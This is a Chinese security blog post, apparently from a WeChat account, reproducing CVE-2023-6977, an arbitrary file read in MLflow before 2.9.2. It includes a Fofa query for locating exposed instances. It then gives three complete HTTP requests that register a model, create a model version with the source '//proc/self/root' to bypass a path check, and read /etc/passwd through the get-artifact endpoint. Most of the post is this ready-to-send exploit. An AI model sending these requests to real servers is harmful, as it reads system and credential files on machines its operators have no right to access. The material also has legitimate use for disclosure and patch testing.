MLflow 2.9.2 任意文件读取漏洞(CVE-2023-6977)
免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
微信公众号搜索:潜陌安全 该文章潜陌安全公众号首发
Fofa:app="MLflow"
漏洞描述
MLflow 是用于机器学习全生命周期管理的开源工具。
在MLflow <2.9.2 中,由于is_local_uri方法验证输入的文件路径时,使用parsed_uri.hostname来检查路径,导致验证可以被绕过。攻击者可以向/ajax-api/2.0/mlflow/model-versions/create的source参数发送构造的路径(如//proc/self/root)绕过检查,再通过请求/model-versions/get-artifact读取任意文件。
漏洞复现
1、创建一个model,(name不可以重名)
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 37
Content-Type: application/json; charset=utf-8
Accept-Encoding: gzip, deflate, br
{"name":"filename"}
2、创建source=//proc/self/root 的model版本
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 65
Content-Type: application/json; charset=utf-8
Accept-Encoding: gzip, deflate, br
{"name":"2bkzVhnVKSS1SFm5QPypN6G6Yt","source":"//proc/self/root"}
3、任意文件读取,漏洞利用成功
GET /model-versions/get-artifact?name=2bkzVhnVKSS1SFm5QPypN6G6Yt&path=etc%2Fpasswd&version=1 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
工具检测
扫描公众号二维码关注,搜索CVE-2023-6977
关注关注作者公众号 :)
分析最新poc,使用渗透测试小工具